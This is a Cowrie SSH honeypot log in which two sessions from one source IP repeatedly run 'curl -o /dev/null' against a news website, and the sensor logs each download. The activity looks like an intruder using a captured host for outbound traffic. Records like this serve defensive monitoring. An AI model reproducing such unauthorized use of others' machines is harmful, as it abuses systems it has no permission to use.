{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.544564Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.549535Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.550728Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.563661Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.583691Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.584973Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.589325Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.590903Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.593637Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.594625Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.625872Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.626956Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.634383Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.635711Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.647038Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.659437Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.663779Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.664734Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.669593Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.670601Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.674807Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.703410Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.704569Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.708701Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.709671Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.744998Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.746037Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.746960Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.750059Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.751004Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.756710Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.765978Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.787823Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.799821Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.801003Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.804043Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.805328Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.806300Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.811287Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.835312Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.838078Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.841445Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.847195Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.848265Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.852979Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.853995Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.856902Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.860470Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.879933Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.885102Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.893172Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.894893Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.895960Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.898391Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.899422Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.901368Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.903373Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.922778Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.931320Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.933259Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.934247Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.938026Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.939089Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.941161Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.953161Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.966956Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.974208Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.975303Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.979373Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:14.980870Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:14.981782Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.011036Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.012648Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.019489Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.020783Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.file_download","url":"http://m.news.cn/","outfile":"var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","shasum":"352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.031177Z","message":"Downloaded URL (http://m.news.cn/) with SHA-256 352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f to var/lib/cowrie/downloads/352de6076623ea3645283d966159317f6b62cff3401fb1f6ae0199f2b358018f","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.051327Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.052655Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.064197Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.065507Z","src_ip":"212.227.125.160","session":"10e67a7b7d1a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T08:30:15.090255Z","src_ip":"212.227.125.160","session":"7541ed730449"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null http://m.news.cn/","message":"CMD: curl -o /dev/null http://m.news.cn/","sensor":"my-vps","timestamp":"2025-09-09T08:30:15.091181Z","src_ip":"212.227.125.160","session":"7541ed730449"}
